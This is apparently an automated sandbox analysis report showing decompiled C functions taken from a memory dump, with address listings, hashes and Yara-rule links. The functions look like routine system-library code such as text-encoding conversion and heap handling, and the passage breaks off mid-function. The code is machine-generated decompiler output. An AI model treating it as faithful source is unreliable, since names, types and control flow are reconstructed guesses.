                                  Function 1E3DEBB0, Relevance: .2, Instructions: 250COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E1E3DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E1E3DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                  0x1e3debb8
                                  0x1e3debbf
                                  0x1e3debc1
                                  0x1e3debc6
                                  0x00000000
                                  0x1e41b6d6
                                  0x1e3debcd
                                  0x1e3debd2
                                  0x1e3dec95
                                  0x1e41b6e0
                                  0x1e3dec9b
                                  0x1e3deca1
                                  0x1e3deca1
                                  0x1e3dec89
                                  0x00000000
                                  0x1e3dec89
                                  0x1e3debd8
                                  0x1e3debdd
                                  0x1e41b6ea
                                  0x00000000
                                  0x1e3debe3
                                  0x1e3debe5
                                  0x1e3debe7
                                  0x1e3debef
                                  0x1e3debf2
                                  0x00000000
                                  0x1e3debf5
                                  0x00000000
                                  0x1e3debf5
                                  0x1e3debf5
                                  0x1e3debf7
                                  0x1e41b6f6
                                  0x1e3dec7c
                                  0x1e3dec7c
                                  0x1e3dec7f
                                  0x1e3dec82
                                  0x1e3dec87
                                  0x00000000
                                  0x1e3dec87
                                  0x1e3dec1a
                                  0x1e3dec1a
                                  0x1e3dec25
                                  0x1e41b725
                                  0x1e41b72c
                                  0x1e41b72c
                                  0x1e3dec2d
                                  0x1e3dec31
                                  0x1e41b73c
                                  0x1e41b744
                                  0x1e41b748
                                  0x1e41b748
                                  0x1e41b749
                                  0x1e41b749
                                  0x1e41b74a
                                  0x1e41b74a
                                  0x1e3dec3e
                                  0x1e41b860
                                  0x00000000
                                  0x1e3dec44
                                  0x1e3dec47
                                  0x1e41b750
                                  0x1e41b758
                                  0x1e41b767
                                  0x1e41b775
                                  0x1e41b77c
                                  0x1e41b77f
                                  0x1e41b769
                                  0x1e41b76c
                                  0x1e41b76c
                                  0x1e41b781
                                  0x1e41b788
                                  0x1e41b78b
                                  0x1e41b75a
                                  0x1e41b75d
                                  0x1e41b75d
                                  0x1e41b78d
                                  0x1e41b792
                                  0x1e41b793
                                  0x1e41b793
                                  0x1e3dec54
                                  0x1e3dec56
                                  0x1e3dec57
                                  0x1e3dec59
                                  0x1e3dec5e
                                  0x1e3decaa
                                  0x1e3ded16
                                  0x1e3ded16
                                  0x1e3decac
                                  0x1e3decaf
                                  0x1e3decb4
                                  0x1e3decb6
                                  0x1e3decb6
                                  0x1e3decb9
                                  0x1e3decbf
                                  0x1e41b7c1
                                  0x1e41b7c8
                                  0x1e41b7d3
                                  0x1e41b7db
                                  0x1e41b7ec
                                  0x1e41b858
                                  0x00000000
                                  0x1e41b858
                                  0x1e41b7ee
                                  0x1e41b7f1
                                  0x1e41b7f4
                                  0x1e41b7ff
                                  0x1e41b850
                                  0x00000000
                                  0x1e41b850
                                  0x1e41b80a
                                  0x1e41b813
                                  0x1e41b81c
                                  0x1e41b81d
                                  0x1e41b822
                                  0x1e41b825
                                  0x1e41b828
                                  0x1e41b831
                                  0x1e41b832
                                  0x1e41b837
                                  0x1e41b840
                                  0x1e41b842
                                  0x1e41b845
                                  0x1e41b848
                                  0x00000000
                                  0x1e41b848
                                  0x1e41b7df
                                  0x00000000
                                  0x1e41b7df
                                  0x1e41b7cc
                                  0x00000000
                                  0x1e41b7cc
                                  0x1e3decc5
                                  0x1e3decc7
                                  0x1e3deccb
                                  0x1e41b79b
                                  0x1e41b79e
                                  0x1e41b7a4
                                  0x00000000
                                  0x00000000
                                  0x1e41b7a6
                                  0x1e41b7a8
                                  0x1e41b7a8
                                  0x1e3decd3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3decd5
                                  0x1e3decd5
                                  0x1e3decd5
                                  0x1e3decd8
                                  0x1e3decda
                                  0x1e3dece4
                                  0x00000000
                                  0x00000000
                                  0x1e3decea
                                  0x1e3deced
                                  0x1e3decf0
                                  0x1e3decf2
                                  0x1e3decfb
                                  0x1e3decfe
                                  0x1e3ded01
                                  0x1e3ded06
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3ded06
                                  0x1e41b7ae
                                  0x1e41b7b1
                                  0x1e41b7b7
                                  0x00000000
                                  0x00000000
                                  0x1e41b7b9
                                  0x1e41b7bb
                                  0x1e3ded08
                                  0x1e3ded08
                                  0x1e3ded0c
                                  0x1e3ded0c
                                  0x00000000
                                  0x1e3dec60
                                  0x1e3dec62
                                  0x1e3ded0f
                                  0x1e3ded0f
                                  0x00000000
                                  0x1e3ded0f
                                  0x1e3dec68
                                  0x1e3dec6c
                                  0x1e3dec6f
                                  0x1e3dec75
                                  0x1e3dec0d
                                  0x1e3dec0d
                                  0x1e3dec18
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3dec18
                                  0x1e3dec77
                                  0x1e3dec79
                                  0x1e3dec79
                                  0x00000000
                                  0x1e3dec68
                                  0x1e3dec5e
                                  0x1e3dec3e
                                  0x1e3debfd
                                  0x1e3dec02
                                  0x1e41b701
                                  0x1e41b70c
                                  0x1e41b71b
                                  0x1e41b71d
                                  0x1e41b71d
                                  0x00000000
                                  0x1e41b70c
                                  0x1e3dec08
                                  0x1e3dec0a
                                  0x00000000
                                  0x1e3dec0a
                                  0x1e3debf5
                                  0x1e3debf5

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                  • Instruction ID: 097d4783adac6b5c0d9c765eb96a3231d038b0de44955d8a77c44c8750b91851
                                  • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                  • Instruction Fuzzy Hash: 34812732E08396CFEB114F6AC8C0259BF56FF52600B68477BE9528F741C265B84AD7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E471D55, Relevance: .2, Instructions: 226COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E1E471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1e481070);
				E1E3FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E1E47337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E1E4733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E1E3E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E1E4733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E1E3DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1e495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t142 = _t136 + 0x14;
						 *((intOrPtr*)(_t136 + 0x14)) = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E1E3DDFDF(_t136 + 0x14, 1, _t142);
					}
					return E1E3FD0D1(_t103);
				}
			}





































                                  0x1e471d55
                                  0x1e471d55
                                  0x1e471d57
                                  0x1e471d5c
                                  0x1e471d63
                                  0x1e471d66
                                  0x1e471d69
                                  0x1e471d6c
                                  0x1e471d6e
                                  0x1e471d71
                                  0x1e471d74
                                  0x1e471d77
                                  0x1e471d7a
                                  0x1e471d7d
                                  0x1e471d82
                                  0x1e471d85
                                  0x1e471d88
                                  0x1e471d8d
                                  0x1e471d90
                                  0x1e471d94
                                  0x1e471d96
                                  0x1e471d98
                                  0x1e471d98
                                  0x1e471d9b
                                  0x1e471d9e
                                  0x00000000
                                  0x1e471da1
                                  0x1e471da5
                                  0x1e471e78
                                  0x1e471e78
                                  0x1e471e82
                                  0x1e471e87
                                  0x1e471e8a
                                  0x1e471e8d
                                  0x1e471e92
                                  0x1e471e95
                                  0x1e471e98
                                  0x1e471e9b
                                  0x1e471ede
                                  0x1e471ee3
                                  0x1e471ee8
                                  0x1e471ef2
                                  0x1e471ef2
                                  0x1e471ef5
                                  0x1e471ef8
                                  0x1e471efe
                                  0x1e471f03
                                  0x00000000
                                  0x1e471f09
                                  0x1e471f0c
                                  0x1e471f0e
                                  0x1e471f11
                                  0x00000000
                                  0x1e471f17
                                  0x1e471f17
                                  0x1e471f1a
                                  0x1e471f31
                                  0x1e471f34
                                  0x1e471f3f
                                  0x1e471f42
                                  0x1e471f45
                                  0x1e471f47
                                  0x1e471f4a
                                  0x1e471f4d
                                  0x1e471f4f
                                  0x1e471f63
                                  0x1e471f65
                                  0x1e471f67
                                  0x00000000
                                  0x1e471f69
                                  0x1e471f69
                                  0x1e471f72
                                  0x1e471f72
                                  0x1e471f75
                                  0x1e471f77
                                  0x00000000
                                  0x00000000
                                  0x1e471f6e
                                  0x1e471f70
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e471f70
                                  0x1e471f83
                                  0x1e471f83
                                  0x1e471f85
                                  0x00000000
                                  0x1e471f85
                                  0x1e471f51
                                  0x1e471f53
                                  0x1e471f5a
                                  0x1e471f5c
                                  0x1e471f87
                                  0x1e471f87
                                  0x1e471f87
                                  0x1e471f8b
                                  0x1e471f8d
                                  0x1e471f90
                                  0x00000000
                                  0x1e471f90
                                  0x1e471f1c
                                  0x1e471f1c
                                  0x00000000
                                  0x1e471f22
                                  0x1e471f22
                                  0x1e471f25
                                  0x1e471f28
                                  0x1e471f97
                                  0x1e471f97
                                  0x1e471f9d
                                  0x1e471fa7
                                  0x1e471faa
                                  0x1e471fb1
                                  0x1e471fb9
                                  0x1e471fbd
                                  0x1e471fbe
                                  0x1e471fc0
                                  0x1e471f2a
                                  0x1e471f93
                                  0x1e471f93
                                  0x1e471f95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e471f95
                                  0x1e471f28
                                  0x1e471f1c
                                  0x1e471f1a
                                  0x1e471f11
                                  0x1e471e9d
                                  0x1e471ea0
                                  0x1e471eae
                                  0x1e471eb4
                                  0x1e471ebc
                                  0x1e471ebc
                                  0x1e471ec2
                                  0x1e471ec8
                                  0x1e471ecd
                                  0x00000000
                                  0x1e471ed3
                                  0x1e471ed3
                                  0x00000000
                                  0x1e471ed3
                                  0x1e471ecd
                                  0x1e471dab
                                  0x1e471dab
                                  0x1e471db1
                                  0x1e471db3
                                  0x1e471db9
                                  0x1e471dbf
                                  0x1e471dc2
                                  0x1e471dda
                                  0x1e471ddd
                                  0x1e471de0
                                  0x1e471de9
                                  0x1e471dec
                                  0x1e471def
                                  0x1e471df1
                                  0x1e471df3
                                  0x1e471e0a
                                  0x1e471e0c
                                  0x1e471e0e
                                  0x00000000
                                  0x1e471e10
                                  0x1e471e10
                                  0x1e471e13
                                  0x1e471e16
                                  0x1e471e16
                                  0x1e471e19
                                  0x1e471e1c
                                  0x1e471e1e
                                  0x1e471e20
                                  0x00000000
                                  0x00000000
                                  0x1e471e22
                                  0x1e471e24
                                  0x00000000
                                  0x1e471e26
                                  0x00000000
                                  0x1e471e26
                                  0x00000000
                                  0x1e471e24
                                  0x1e471e30
                                  0x1e471e30
                                  0x00000000
                                  0x1e471e30
                                  0x1e471df5
                                  0x1e471df7
                                  0x1e471e01
                                  0x1e471e32
                                  0x1e471e34
                                  0x1e471e36
                                  0x00000000
                                  0x1e471e36
                                  0x1e471dc4
                                  0x1e471dc4
                                  0x00000000
                                  0x1e471dc6
                                  0x1e471dc6
                                  0x1e471dc9
                                  0x1e471dcf
                                  0x1e471dd1
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471e38
                                  0x1e471dc4
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471dbb
                                  0x1e471e3a
                                  0x1e471e3a
                                  0x1e471e3d
                                  0x1e471e40
                                  0x1e471e43
                                  0x1e471e6f
                                  0x1e471fc7
                                  0x1e471fc7
                                  0x1e471e75
                                  0x1e471e75
                                  0x00000000
                                  0x1e471e75
                                  0x1e471e6f
                                  0x1e471fca
                                  0x1e471fca
                                  0x1e471fce
                                  0x1e471fd0
                                  0x1e471fd3
                                  0x1e471fd9
                                  0x1e471fde
                                  0x1e471fe4
                                  0x1e471fe4
                                  0x1e471fee
                                  0x1e471fee

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                  • Instruction ID: 7fb750c4c9091f84531e326bb53b5614921b848db16c385013b262d1adb4b2f1
                                  • Opcode Fuzzy Hash: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                  • Instruction Fuzzy Hash: 19814C75E102598FDB08CFA9C8909ECB7F3BF49354B14436AE415AB394DB31A94ACF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E461002, Relevance: .2, Instructions: 198COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E1E461002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1e495898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x1e4958b0 = _t128;
								 *0x1e4958b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x1e4958b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
